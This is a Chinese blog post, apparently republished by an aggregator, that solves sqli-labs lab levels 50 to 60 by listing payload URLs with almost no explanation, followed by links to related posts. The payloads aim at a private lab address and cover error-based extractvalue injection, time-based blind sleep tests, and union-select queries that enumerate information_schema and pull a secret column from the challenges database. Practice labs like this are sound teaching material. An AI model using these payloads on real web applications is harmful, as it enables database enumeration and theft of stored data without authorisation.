20171105早sqli-libs Less 50-60

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20171105早sqli-libs Less 50-60相关的知识,希望对你有一定的参考价值。

Less 50-60 题目类型都没有新奇的注入方式,基本上是以往类型的注入,或者是复合型注入。老黑不进行多加赘述了,多加解释,只会看低读者的智商。payload如下所示

 1 Less 50
 2 http://192.168.162.135/sqli-libs/Less-50/?sort=1 and extractvalue(1, concat(0x7e, database()))--+
 3 Less 51
 4 http://192.168.162.135/sqli-libs/Less-51/?sort=1‘ and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 5 Less 52
 6 http://192.168.162.135/sqli-libs/Less-52/?sort=1 and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 7 Less 53
 8 http://192.168.162.135/sqli-libs/Less-53/?sort=1‘ and (if(ascii(left(database(),1))=115, sleep(4), 0))--+
 9 Less 54
10 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
11 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema =‘challenges‘ and table_name=‘POV9ATA70T‘)--+
12 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,2,(select group_concat(id,0x7c,sessid,0x7c,secret_Y7BB,0x7c,tryy) from challenges.POV9ATA70T)--+
13 http://192.168.162.135/sqli-libs/Less-54/?id=-1‘ union select 1,version(),database()--+
14 Less 55
15 http://192.168.162.135/sqli-libs/Less-55/?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
16 Less 56
17 http://192.168.162.135/sqli-libs/Less-56/?id=-1‘) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
18 Less 57
19 http://192.168.162.135/sqli-libs/Less-57/?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘ --+
20 Less 58
21 http://192.168.162.135/sqli-libs/Less-58/?id=-1‘ union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘), 0x7e))--+
22 Less 59:
23 http://192.168.162.135/sqli-libs/Less-59/?id=-1 union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘), 0x7e))--+
24 Less 60:
25 http://192.168.162.135/sqli-libs/Less-60/?id=-1") union select extractvalue(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=‘challenges‘), 0x7e))--+

 

  

以上是关于20171105早sqli-libs Less 50-60的主要内容,如果未能解决你的问题,请参考以下文章

20171102早sqli-libs Less 29-39

20171030早sqli-libs Less7-15 练习

20171031中sqli-libs Less 18-22

sqli-libs注入(5-10关)

sqli-libs

sqlmap 扫描注入漏洞